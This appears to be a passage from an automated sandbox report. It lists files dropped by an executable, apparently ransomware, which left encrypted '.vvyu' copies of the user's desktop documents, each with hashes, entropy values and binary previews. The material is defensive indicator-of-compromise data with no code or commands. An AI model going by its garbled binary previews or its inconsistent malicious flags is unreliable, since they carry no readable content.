C:\Users\user\Desktop\EFOYFBOLXA.png

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862090750833261
Encrypted:	false
SSDEEP:	24:YjsVlpj6jjfWhR8OTO0dEfp04SkcpVMQYIMM+vvJSVZ+vtzrsbD:YjsLpjgzWheOTuB04WVfHzwJSVwlrmD
MD5:	27E8BE6DDF1CBBD0DA11A7059F50C7CC
SHA1:	8271275BFB59D5A65C47793381DCC8040E10FCC5
SHA-256:	A0503683703E00684D4D35BC6CAD3B5C472C12A21006E32FC3903AE514EF9E7D
SHA-512:	5C44CE0A7ACF17F5BCFBF84D3464EF29596170183A3C9284B2CD54CDAC75EFECCF3E04F1920E755EF1EB2A2D0E7D982B5C8FB9274D5C33239B40DB3D1F1BC861
Malicious:	false
Preview:	EFOYF\|.?x..E.Nn.........8CW.......e...?..1.U...O.`...&\|2F..H.::....$B.R.o<...PL.A..S...FN.s..K............tj..ss....!A{....5).../7.Q...ed...4l@...kN.....K`. ...Z.....Dw... (..~.d.d..'T.......d.R..H......+!.....$dxa..0.s..V..]G....VM.1-`.S9s.....k.~Whe....B1.....J.>.R+..#G...z....F.D2...+.J.......H.3.@..(..rp.d.a..z.bg.....j%.Zc,f.d.I...qL`.FQB....S[[.d.H.....Y.I.G.G.no....m.}t%.8.(...l......c&.5:..kX(.4'].g..x.p~j1nn..."X<.-.....2$.H......3..h#Q...4T.?a.;V+...g+.6:{.....#..".-....%..]...n.....$........(...DL...3^X.Ri.r".f..G....\DJ...k.%..x...C..X..\|y..0..+...^-R..q\a@..k...&S....'K..E2......K..4......W{.{4....aN........Rq<.9...>.v...{.`...`.P.X}.<.}y..g.".9^.t...,j.ln.....{...R }..>?.l.]...cOJ...9...k...1q.L.-=...H...t..nhq..e%c4...Ea.9[qD@w........-'...U?..+...".7...2.x.u..[....F....<..%...7...>9.PI(h..4H.}.O..9;.....%.mX!...m.p..u..s..F. ....'...H}..R.h..........]"U=&....G-..8...{..!Z..@o.....jXw3.~..}SD.........Y..z.Z...tT..&.I(.

C:\Users\user\Desktop\EFOYFBOLXA.png.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862090750833261
Encrypted:	false
SSDEEP:	24:YjsVlpj6jjfWhR8OTO0dEfp04SkcpVMQYIMM+vvJSVZ+vtzrsbD:YjsLpjgzWheOTuB04WVfHzwJSVwlrmD
MD5:	27E8BE6DDF1CBBD0DA11A7059F50C7CC
SHA1:	8271275BFB59D5A65C47793381DCC8040E10FCC5
SHA-256:	A0503683703E00684D4D35BC6CAD3B5C472C12A21006E32FC3903AE514EF9E7D
SHA-512:	5C44CE0A7ACF17F5BCFBF84D3464EF29596170183A3C9284B2CD54CDAC75EFECCF3E04F1920E755EF1EB2A2D0E7D982B5C8FB9274D5C33239B40DB3D1F1BC861
Malicious:	false
Preview:	EFOYF\|.?x..E.Nn.........8CW.......e...?..1.U...O.`...&\|2F..H.::....$B.R.o<...PL.A..S...FN.s..K............tj..ss....!A{....5).../7.Q...ed...4l@...kN.....K`. ...Z.....Dw... (..~.d.d..'T.......d.R..H......+!.....$dxa..0.s..V..]G....VM.1-`.S9s.....k.~Whe....B1.....J.>.R+..#G...z....F.D2...+.J.......H.3.@..(..rp.d.a..z.bg.....j%.Zc,f.d.I...qL`.FQB....S[[.d.H.....Y.I.G.G.no....m.}t%.8.(...l......c&.5:..kX(.4'].g..x.p~j1nn..."X<.-.....2$.H......3..h#Q...4T.?a.;V+...g+.6:{.....#..".-....%..]...n.....$........(...DL...3^X.Ri.r".f..G....\DJ...k.%..x...C..X..\|y..0..+...^-R..q\a@..k...&S....'K..E2......K..4......W{.{4....aN........Rq<.9...>.v...{.`...`.P.X}.<.}y..g.".9^.t...,j.ln.....{...R }..>?.l.]...cOJ...9...k...1q.L.-=...H...t..nhq..e%c4...Ea.9[qD@w........-'...U?..+...".7...2.x.u..[....F....<..%...7...>9.PI(h..4H.}.O..9;.....%.mX!...m.p..u..s..F. ....'...H}..R.h..........]"U=&....G-..8...{..!Z..@o.....jXw3.~..}SD.........Y..z.Z...tT..&.I(.

C:\Users\user\Desktop\EFOYFBOLXA.xlsx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856312192794189
Encrypted:	false
SSDEEP:	24:jFwGigDCkLfeidpjPn9a1bSoOsOXS2hAGVEk5eb/LC6HTZxZhsbD:WGPlL/ddnU1xOVXVr7d6zZvhmD
MD5:	7C9BB75E420EE389746C34A15DB389D9
SHA1:	BB8F3912A28C631D000244562BD01ADF3823D6FB
SHA-256:	C6EA9A48EDADE55E2EE11D22F4C10D68AFCA1E2503EF8F4D0D1BD8DC1CB46098
SHA-512:	CB55FF42B1EF25D3877C044C5CC936FC3915905C4D6AC63CF65F5186ED96FAC635E399195D646FD2F25BE99E19EAF92DFCC6DF8FBD93BEC8B48D173BEA9C560F
Malicious:	false
Preview:	EFOYF..Z.....`.3..N.hF.....r...\......,.@}.jQH..h$.V.......-......I.c.u.3+`.'......kk........g......9...$.Ytq/.%q..&^.&w.3(.."...9(.u.s. (...6..Y6..".R.{.)r...:...O..>....%.b.!?..('.-..h..p...dO}%M..q.xaD.A....B.....}"..`.i.Y=...3e..S.z...wm.....t.\|y..0>......x..,...y....=.x....3...o-.:..H@_..,..h....U...m..H.....@[..S.V..@..1'.e..u]8*+.....f_;..).^..>..^..`#...Q..\|.+...]M......... ..V.+?.b.(....1..>..A...x-..&Q../X....Wl...EPD.8.R'6.A....)..S...zC..kX0]}f\=..o.X.+...Ck....d.L._...<.....".O...Y......L..Yh<.af.i....7.oMxqa....\.-3c.W>.tP...C....F.<U..2.Z.1....QuT.s_In....P.xA.oT~...".5.j.RN[G+.3.$.tW...CE&.Nr.<.%:..$[....H[...\|....k.j..........3..)..(+.{.]OX.F:?...&U%N.../ZN...4F.F....4.......)......./..Zt3C....j..........U...(.E)L....R.}..BWxc..}M.Y.I.......X!Ud.}..er..C......DN..O......E.bkZG.$...kN..s;/.5.U.;.........-?..~.3.=..A......c.......w%Cy.k.2..Q.z.!... .S....a..Bs....x2<6:q4.....Log.....n..A.?..4.!......@.J..``.6..I.b.hPH3

C:\Users\user\Desktop\EFOYFBOLXA.xlsx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856312192794189
Encrypted:	false
SSDEEP:	24:jFwGigDCkLfeidpjPn9a1bSoOsOXS2hAGVEk5eb/LC6HTZxZhsbD:WGPlL/ddnU1xOVXVr7d6zZvhmD
MD5:	7C9BB75E420EE389746C34A15DB389D9
SHA1:	BB8F3912A28C631D000244562BD01ADF3823D6FB
SHA-256:	C6EA9A48EDADE55E2EE11D22F4C10D68AFCA1E2503EF8F4D0D1BD8DC1CB46098
SHA-512:	CB55FF42B1EF25D3877C044C5CC936FC3915905C4D6AC63CF65F5186ED96FAC635E399195D646FD2F25BE99E19EAF92DFCC6DF8FBD93BEC8B48D173BEA9C560F
Malicious:	false
Preview:	EFOYF..Z.....`.3..N.hF.....r...\......,.@}.jQH..h$.V.......-......I.c.u.3+`.'......kk........g......9...$.Ytq/.%q..&^.&w.3(.."...9(.u.s. (...6..Y6..".R.{.)r...:...O..>....%.b.!?..('.-..h..p...dO}%M..q.xaD.A....B.....}"..`.i.Y=...3e..S.z...wm.....t.\|y..0>......x..,...y....=.x....3...o-.:..H@_..,..h....U...m..H.....@[..S.V..@..1'.e..u]8*+.....f_;..).^..>..^..`#...Q..\|.+...]M......... ..V.+?.b.(....1..>..A...x-..&Q../X....Wl...EPD.8.R'6.A....)..S...zC..kX0]}f\=..o.X.+...Ck....d.L._...<.....".O...Y......L..Yh<.af.i....7.oMxqa....\.-3c.W>.tP...C....F.<U..2.Z.1....QuT.s_In....P.xA.oT~...".5.j.RN[G+.3.$.tW...CE&.Nr.<.%:..$[....H[...\|....k.j..........3..)..(+.{.]OX.F:?...&U%N.../ZN...4F.F....4.......)......./..Zt3C....j..........U...(.E)L....R.}..BWxc..}M.Y.I.......X!Ud.}..er..C......DN..O......E.bkZG.$...kN..s;/.5.U.;.........-?..~.3.=..A......c.......w%Cy.k.2..Q.z.!... .S....a..Bs....x2<6:q4.....Log.....n..A.?..4.!......@.J..``.6..I.b.hPH3

C:\Users\user\Desktop\EOWRVPQCCS.pdf

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.834968114135507
Encrypted:	false
SSDEEP:	24:k3VyyQ5VTe1uWaIjvNcbnlASh9TF+Up604ZdmOqCVR8sbD:CyE1uWawNGnGSh+lZd3qZmD
MD5:	2C7AF5D22E9A327E3B94889BF50A785A
SHA1:	4E5F72739F6954B1E4D763DFBC99D688E0877784
SHA-256:	75F98059C06FE1DBFA142FCE7BD5C7B2EABD2EC6713BE3B287C7F5AA7C3FFDE5
SHA-512:	FFB83FD90F50C61DD5EC162DBDEDDE835456728E9984A1DFF6694C4322314BC0B42637679E3D1F3EC139B90035F92C0668F19C5737496E84055FB38010A327FA
Malicious:	false
Preview:	EOWRV/....k.oV3W.oS....8q.vM..\|.2dJ....&]5:.b..#.......xJ....(2...v..+`.HQ}..e.....{.S.K.....O9..=.z.0C..F+(.ax.n.KK....B..3.j.....-.X.k.Q...q(.h.z......3....^....S.G~Rg....V...([......b..\|.._u......3?.mk.Fu.}WX......o...TI...rok.yD.q.:..{./....+(.z...3U0.x.6U.Z.p(.....(.r.F(.Y...F.Y...'n..4.T...F.8...H.v...a\.d........nG#...y".G..I.`..~a..w2(..#u.L..-A.Q...ci..x..xA.WN.@..jB.......%B,......Gg..yHM..`..4.........<.\,......o.B80E#..]. )...c.^.9...@<9.n..AK..q.....P..z+...8U.Z.l..z.`B.D...*..#h+5i.].......n..Q..u!..C....#...z......x%\....U.]...]V..........2N.<.....33...S.'X.,.q...j3.Z.X.!..[.r.~F.....Rc>.W...t.r?...c.q......}v=TS..7....A.4"..X....!.]C...rV.C..E../.r..s..)8...u.?..z...h..d.D......q....;...'8.E.mE....].^@....~Z.0.@...I..wu....`F.n:+[........t.('.3bp..{.X..R.D...ot.`;........t.......]...L'k.2..-.B.&..Z.L.\.Dnw.....bjo6.Mg.#:..?....E..Hr'n.Z.A....w.b...?.z......0....`Px.b.rd..K.V.X...a....G1..3.+...U.........II...Dx..e.3;...x_.

C:\Users\user\Desktop\EOWRVPQCCS.pdf.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.834968114135507
Encrypted:	false
SSDEEP:	24:k3VyyQ5VTe1uWaIjvNcbnlASh9TF+Up604ZdmOqCVR8sbD:CyE1uWawNGnGSh+lZd3qZmD
MD5:	2C7AF5D22E9A327E3B94889BF50A785A
SHA1:	4E5F72739F6954B1E4D763DFBC99D688E0877784
SHA-256:	75F98059C06FE1DBFA142FCE7BD5C7B2EABD2EC6713BE3B287C7F5AA7C3FFDE5
SHA-512:	FFB83FD90F50C61DD5EC162DBDEDDE835456728E9984A1DFF6694C4322314BC0B42637679E3D1F3EC139B90035F92C0668F19C5737496E84055FB38010A327FA
Malicious:	false
Preview:	EOWRV/....k.oV3W.oS....8q.vM..\|.2dJ....&]5:.b..#.......xJ....(2...v..+`.HQ}..e.....{.S.K.....O9..=.z.0C..F+(.ax.n.KK....B..3.j.....-.X.k.Q...q(.h.z......3....^....S.G~Rg....V...([......b..\|.._u......3?.mk.Fu.}WX......o...TI...rok.yD.q.:..{./....+(.z...3U0.x.6U.Z.p(.....(.r.F(.Y...F.Y...'n..4.T...F.8...H.v...a\.d........nG#...y".G..I.`..~a..w2(..#u.L..-A.Q...ci..x..xA.WN.@..jB.......%B,......Gg..yHM..`..4.........<.\,......o.B80E#..]. )...c.^.9...@<9.n..AK..q.....P..z+...8U.Z.l..z.`B.D...*..#h+5i.].......n..Q..u!..C....#...z......x%\....U.]...]V..........2N.<.....33...S.'X.,.q...j3.Z.X.!..[.r.~F.....Rc>.W...t.r?...c.q......}v=TS..7....A.4"..X....!.]C...rV.C..E../.r..s..)8...u.?..z...h..d.D......q....;...'8.E.mE....].^@....~Z.0.@...I..wu....`F.n:+[........t.('.3bp..{.X..R.D...ot.`;........t.......]...L'k.2..-.B.&..Z.L.\.Dnw.....bjo6.Mg.#:..?....E..Hr'n.Z.A....w.b...?.z......0....`Px.b.rd..K.V.X...a....G1..3.+...U.........II...Dx..e.3;...x_.

C:\Users\user\Desktop\EWZCVGNOWT.jpg

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850315711043332
Encrypted:	false
SSDEEP:	24:OMvadqDVy1RGvG0sF3ispepd9Puh1gX7y77XEn+zB01vBC7yY5zp1sbD:raI4RGvnmisWWac7+EuvBwXZmD
MD5:	6D99DDA32391A367B0C92A6638D1B784
SHA1:	3D9CC9F153F719A0A78969EFF47C8C0CEB67C81C
SHA-256:	0F278CE9B3755C90E2444C6D8980FCA72FCB6D0290D2128C34550EC959190ACC
SHA-512:	B30EDE34CE750F49320F8ABB841AF69F73573066284F8CB5106F1C83CA005102475DC07AA67630F0D959E9DF77164833E7A26103DADC1DF65A4072ABE5024467
Malicious:	false
Preview:	EWZCV+d.....b...w!..d....y..l..0.3...../F.:^o.k..7....3}..k.......>.+A...'d..Q...8@..i.E...!.[.?...P...O.B.'C"^\|./b......O6.7]>q.,07..=.H...j..O0..K!...]$#dn.}P...w.2......Ur...qw..o......Gx..D4OL.O.'.M..%n.Hc..,....WD.}@..WR..._.Z....y.L..]!z.9...^.<.Zbc...dF ...h..!!T../.cI........A6tn..QJ"\..QD#.... .....l.I...w.......$..D:....Y.NS.......W...nRI..w..0@:uq..};..k.m.#...!...?>s.m..g..n/0.........A.._2d.%..9.b...o..H.U:1#.....t<.e.L9....].O%.&z.mO!$.8.....Cx.u=..x+...m.../8...I..[..Y.../..?6X..y'...Gclb.#/..w.b....n\|..~s.Y.....O.C.8Ns.M<w.......h.F....d...9.3o.9..Xs......a.C.....:..}ch....+....,x..3...\|h.......A.....V....!3Y79A..{(r./.c...X....O..t...%..X.gv{.4..l\7....aU.&....i6z.N....R......x.H.Y..e...K;.HKM..J..........;1.o...q...bY..\|.d.. ..DP..8.B`.^.....'.h-...3;..H.. .r...u....`U.$.r.K..R-...k.L..OM.........4.v.S..q.0......f.."l/......F.....d..X.%.'h.&9.1.......]..........w.}..([......S9.a%..n.V....>.t<...j.#.z..2.T......

C:\Users\user\Desktop\EWZCVGNOWT.jpg.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850315711043332
Encrypted:	false
SSDEEP:	24:OMvadqDVy1RGvG0sF3ispepd9Puh1gX7y77XEn+zB01vBC7yY5zp1sbD:raI4RGvnmisWWac7+EuvBwXZmD
MD5:	6D99DDA32391A367B0C92A6638D1B784
SHA1:	3D9CC9F153F719A0A78969EFF47C8C0CEB67C81C
SHA-256:	0F278CE9B3755C90E2444C6D8980FCA72FCB6D0290D2128C34550EC959190ACC
SHA-512:	B30EDE34CE750F49320F8ABB841AF69F73573066284F8CB5106F1C83CA005102475DC07AA67630F0D959E9DF77164833E7A26103DADC1DF65A4072ABE5024467
Malicious:	false
Preview:	EWZCV+d.....b...w!..d....y..l..0.3...../F.:^o.k..7....3}..k.......>.+A...'d..Q...8@..i.E...!.[.?...P...O.B.'C"^\|./b......O6.7]>q.,07..=.H...j..O0..K!...]$#dn.}P...w.2......Ur...qw..o......Gx..D4OL.O.'.M..%n.Hc..,....WD.}@..WR..._.Z....y.L..]!z.9...^.<.Zbc...dF ...h..!!T../.cI........A6tn..QJ"\..QD#.... .....l.I...w.......$..D:....Y.NS.......W...nRI..w..0@:uq..};..k.m.#...!...?>s.m..g..n/0.........A.._2d.%..9.b...o..H.U:1#.....t<.e.L9....].O%.&z.mO!$.8.....Cx.u=..x+...m.../8...I..[..Y.../..?6X..y'...Gclb.#/..w.b....n\|..~s.Y.....O.C.8Ns.M<w.......h.F....d...9.3o.9..Xs......a.C.....:..}ch....+....,x..3...\|h.......A.....V....!3Y79A..{(r./.c...X....O..t...%..X.gv{.4..l\7....aU.&....i6z.N....R......x.H.Y..e...K;.HKM..J..........;1.o...q...bY..\|.d.. ..DP..8.B`.^.....'.h-...3;..H.. .r...u....`U.$.r.K..R-...k.L..OM.........4.v.S..q.0......f.."l/......F.....d..X.%.'h.&9.1.......]..........w.}..([......S9.a%..n.V....>.t<...j.#.z..2.T......

C:\Users\user\Desktop\EWZCVGNOWT.mp3

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856340953598135
Encrypted:	false
SSDEEP:	24:spzrSBMHARrUPpDQNcsVW+389HqH+8Ga3ZbboPwbvA5DMj1iKnhAsbD:2rSBMgRrcpDmoWBWIDA5Yj13mmD
MD5:	6A8D98C05D88C379DBA5A0A4430F65EC
SHA1:	23151BB7C0C74E96E375F0D7268C951AD5730AC4
SHA-256:	41999ED618FDCE88F1542AAB3E607A1096162767DBB44903BCF973537F8E45E8
SHA-512:	233B05C1BC1DC5055099015AA9E80DEFA41684D87D04A6E8EF63665F83EB7AD26D5938539BB443FD81915261CFEB1B35DAB84AF86C999961FB9B82B544652DF3
Malicious:	true
Preview:	EWZCV.%...~....<...~.I.\|.3i]u.D...s..Uk.g/.yd\.$>.....]..m...xx...$....va.JaXL.G.;j.]na..=<.X..?....J./M>.$....U..u.$....W.......K...a#.E.5...i.Z..3 ./T.U....KC...8....!b.....!..q.8:.~.,".G."I./..........`....m..{K.SXb..M#..P......y.r.<.h`.}\.C..".....l.@)q....N.s`.6.....['.....k8...}zpsn.b:.&.2X...\..T@~......>{K<0..V...f..d.A{......i.F\.&.A.....-!.n6..i...a.gP...Q.....E.=q.....\|...R).t:..X7..K.g2.=..'.a.....q7..`.3..X...nA&R..h..o<.@.+....;..2..q......Op....._}......6.>Os........dK.oPf._..L.D.....q...!Y...T.jP..i..<.y....3....&"......p....T.Q..:.......5......i...).f...w.n...d...........d...n.2..{....X~].-...../....Dz.B..q......w........k.b.D.Mr.c8Z..B...57.G..1]j\|...yVxT..,`.0.Z P...V..C..~{<.-....V.r.E..E...}.d.<jp._n1..u.G.l..K..t{^.j.y...A+....7.V......;...',#A..cZ.A. ...7.i.S.X...m{9...H...#.z.O#..!.[..U....@..].Vy-.=Rq...m@.M.....3fy.?F...:S......\..[/..y...(....op3.Qu..>S.l. ....L.B8..>.G...K.s._D.&f.8{.X...1F..$..sl..........9;\.5

C:\Users\user\Desktop\EWZCVGNOWT.mp3.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856340953598135
Encrypted:	false
SSDEEP:	24:spzrSBMHARrUPpDQNcsVW+389HqH+8Ga3ZbboPwbvA5DMj1iKnhAsbD:2rSBMgRrcpDmoWBWIDA5Yj13mmD
MD5:	6A8D98C05D88C379DBA5A0A4430F65EC
SHA1:	23151BB7C0C74E96E375F0D7268C951AD5730AC4
SHA-256:	41999ED618FDCE88F1542AAB3E607A1096162767DBB44903BCF973537F8E45E8
SHA-512:	233B05C1BC1DC5055099015AA9E80DEFA41684D87D04A6E8EF63665F83EB7AD26D5938539BB443FD81915261CFEB1B35DAB84AF86C999961FB9B82B544652DF3
Malicious:	false
Preview:	EWZCV.%...~....<...~.I.\|.3i]u.D...s..Uk.g/.yd\.$>.....]..m...xx...$....va.JaXL.G.;j.]na..=<.X..?....J./M>.$....U..u.$....W.......K...a#.E.5...i.Z..3 ./T.U....KC...8....!b.....!..q.8:.~.,".G."I./..........`....m..{K.SXb..M#..P......y.r.<.h`.}\.C..".....l.@)q....N.s`.6.....['.....k8...}zpsn.b:.&.2X...\..T@~......>{K<0..V...f..d.A{......i.F\.&.A.....-!.n6..i...a.gP...Q.....E.=q.....\|...R).t:..X7..K.g2.=..'.a.....q7..`.3..X...nA&R..h..o<.@.+....;..2..q......Op....._}......6.>Os........dK.oPf._..L.D.....q...!Y...T.jP..i..<.y....3....&"......p....T.Q..:.......5......i...).f...w.n...d...........d...n.2..{....X~].-...../....Dz.B..q......w........k.b.D.Mr.c8Z..B...57.G..1]j\|...yVxT..,`.0.Z P...V..C..~{<.-....V.r.E..E...}.d.<jp._n1..u.G.l..K..t{^.j.y...A+....7.V......;...',#A..cZ.A. ...7.i.S.X...m{9...H...#.z.O#..!.[..U....@..].Vy-.=Rq...m@.M.....3fy.?F...:S......\..[/..y...(....op3.Qu..>S.l. ....L.B8..>.G...K.s._D.&f.8{.X...1F..$..sl..........9;\.5

C:\Users\user\Desktop\GRXZDKKVDB.mp3

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.837554701611181
Encrypted:	false
SSDEEP:	24:MwtW23kZu9wIWIKDmowXFlekJRuQ62D4bPa5TbN+CVAGJlr8oMVHs2nHKlksbD:Ftn3kg6KKDpYle0cQ7g4nfXr2VrmD
MD5:	DFBEC218567B22D46CB3E7FBC8B7F795
SHA1:	F105FE2854106FD444A1020FD1DC91ADF85DAD31
SHA-256:	D98C12224F00E410A44BF3431A09C4E2BDC9F98F2664AD0C34CB532AA31C8579
SHA-512:	45332DE1421C7EC6AD562C105076689D394743526364EDAB9A98763F274767EBE71DE9B85D5B7512AF6434A09526E1173976CD564E996BE80F954B7FA3389F85
Malicious:	false
Preview:	GRXZD..0...((...~.5<..m<...P/q.]G).2..i..s6.uk.)..U@V..b.5.....c.........uy..z..."rc....o.&..q...\9.o..jU..{.&.i.......3.3b..y..2.X.....]z.7.D...;..z\.'BPX...p..,^...Q!....PM"Si.\|..$....K.y...N.N.+.^\|$.......,.....0.....lRGQz...U.L.........[Bxo..vSL.....<mB<.U..s.8..!....r.9\|a..M`...M..`.p..v.f..f. u....."!x.X.p;..Fz .....y...M^.a.......g2..V.......... 8....../...U...g.;...b....5...w,<7..OTA.Kwy+.....p......b..S-.wh="...j.......J'..[~..1..k...j..N..K.B....t.R.v\|.....F.....: %...9\|....i./...%.j.N..Q7a...s....1E........r..v.).m%:iv)n..D....g\..e.M.P.D-.......Q..o=.-..,.........i..u..y.X.-.{.?..im.:;.ZE...n...d...;#....(x....K.'.:.N....]%.&Pd..-E2CC.....}$........%.+........&E-}~....whf+...gM.C.I(.2........a.E3..&........+...<...F..65...VZK.J=.5...YG6Pl.Et....#.....i.yR.j.;..u.~h.8./..........D.CvMJ.ad.=..QS.%.o....9..x...1.oN..}......v........D. .G..(....s.@.ZJ.j.8.j*.!.....@.21..~..2<=.L8.MT.X....Sy....v.....u...y...\|.-x..g

C:\Users\user\Desktop\GRXZDKKVDB.mp3.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.837554701611181
Encrypted:	false
SSDEEP:	24:MwtW23kZu9wIWIKDmowXFlekJRuQ62D4bPa5TbN+CVAGJlr8oMVHs2nHKlksbD:Ftn3kg6KKDpYle0cQ7g4nfXr2VrmD
MD5:	DFBEC218567B22D46CB3E7FBC8B7F795
SHA1:	F105FE2854106FD444A1020FD1DC91ADF85DAD31
SHA-256:	D98C12224F00E410A44BF3431A09C4E2BDC9F98F2664AD0C34CB532AA31C8579
SHA-512:	45332DE1421C7EC6AD562C105076689D394743526364EDAB9A98763F274767EBE71DE9B85D5B7512AF6434A09526E1173976CD564E996BE80F954B7FA3389F85
Malicious:	false
Preview:	GRXZD..0...((...~.5<..m<...P/q.]G).2..i..s6.uk.)..U@V..b.5.....c.........uy..z..."rc....o.&..q...\9.o..jU..{.&.i.......3.3b..y..2.X.....]z.7.D...;..z\.'BPX...p..,^...Q!....PM"Si.\|..$....K.y...N.N.+.^\|$.......,.....0.....lRGQz...U.L.........[Bxo..vSL.....<mB<.U..s.8..!....r.9\|a..M`...M..`.p..v.f..f. u....."!x.X.p;..Fz .....y...M^.a.......g2..V.......... 8....../...U...g.;...b....5...w,<7..OTA.Kwy+.....p......b..S-.wh="...j.......J'..[~..1..k...j..N..K.B....t.R.v\|.....F.....: %...9\|....i./...%.j.N..Q7a...s....1E........r..v.).m%:iv)n..D....g\..e.M.P.D-.......Q..o=.-..,.........i..u..y.X.-.{.?..im.:;.ZE...n...d...;#....(x....K.'.:.N....]%.&Pd..-E2CC.....}$........%.+........&E-}~....whf+...gM.C.I(.2........a.E3..&........+...<...F..65...VZK.J=.5...YG6Pl.Et....#.....i.yR.j.;..u.~h.8./..........D.CvMJ.ad.=..QS.%.o....9..x...1.oN..}......v........D. .G..(....s.@.ZJ.j.8.j*.!.....@.21..~..2<=.L8.MT.X....Sy....v.....u...y...\|.-x..g

C:\Users\user\Desktop\NVWZAPQSQL.docx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860736649054753
Encrypted:	false
SSDEEP:	24:FH8Z4Z1RPbh7bcOuMg/BHnRzK1MtLNEBmJqLwOvTNXk3DA5oQcDq8CNnkAvVrUsX:FHHZ1RPbdcOvEH4adqXvJk3DAiQcJAvp
MD5:	35FEB330754754EC57F09D3EB7E32E2B
SHA1:	22740C8C4F2B3F9AF5199207DA11EC375C7A83D1
SHA-256:	CFEB22454524B88B2ED446E7C336E2D7DDEC5D83EDF8533050FF2483E283EC01
SHA-512:	DA0AA06E77674F95195024352B0E583E1B098FA39D4A74F4FED76FD418D874A876CDFC0F325993A07218474024C4898BE4DC9347A2F31605E7BDB0712E1F1138
Malicious:	false
Preview:	NVWZAid...m.'....(.....o]..o..5..i....T..kim....%......5.DA..W1...d.P..R8f8.;S?......G.,..I....q..)^....,........."..u..r....c.\..~.x.xcQ.).y......gb.YP..1_}.K.......9...K.0...{._r. q...HP.`.......S..<t...!.X..u......^-..f........mS..........Q..........kK.....q"u...e.@'........n....I.$......%X$..`.......W.DU..L.............e.<.N.&..{........h......<=s.DwX..f..V.2...d(....w..9p+d..K.."..Z.f....C..kj.!BS....8P.b=..d... .....A/_@.(.sD.GX.U..y........V..Td..^........G.~..{z.RpFAs.F.MG`.T{...._.s...A.Z..Z...7....p...#.VT.....I.....\|Nv.A.y#-.._...~...'>.l.,.V+=I.....<j.y)g.B...a...n..?^..h...8...6.,..`d...?Fa'B.z.\7$.$.+..zP.K....J..p\|P..Q.7nq.H&...M...$.&4.8.....(0w.$... K._6..u.?1.m....u}H.........3.\|(;YvO...U..M.....G.RE4..M#...E.g......+.@..O,G....f.9.b!N........1+}..6.&F?.$7.C7..j....\|..&..H<'.J.H+ .T.....M.!.!.m.R6C->[l...2...J).o.)...*....ZJ.r...m.#.u.....0_A...eQP...P...i1^a...\|.d..G..>sZe.#.CD7F6...VX.x..M=..._....=.:.8u........

C:\Users\user\Desktop\NVWZAPQSQL.docx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860736649054753
Encrypted:	false
SSDEEP:	24:FH8Z4Z1RPbh7bcOuMg/BHnRzK1MtLNEBmJqLwOvTNXk3DA5oQcDq8CNnkAvVrUsX:FHHZ1RPbdcOvEH4adqXvJk3DAiQcJAvp
MD5:	35FEB330754754EC57F09D3EB7E32E2B
SHA1:	22740C8C4F2B3F9AF5199207DA11EC375C7A83D1
SHA-256:	CFEB22454524B88B2ED446E7C336E2D7DDEC5D83EDF8533050FF2483E283EC01
SHA-512:	DA0AA06E77674F95195024352B0E583E1B098FA39D4A74F4FED76FD418D874A876CDFC0F325993A07218474024C4898BE4DC9347A2F31605E7BDB0712E1F1138
Malicious:	false
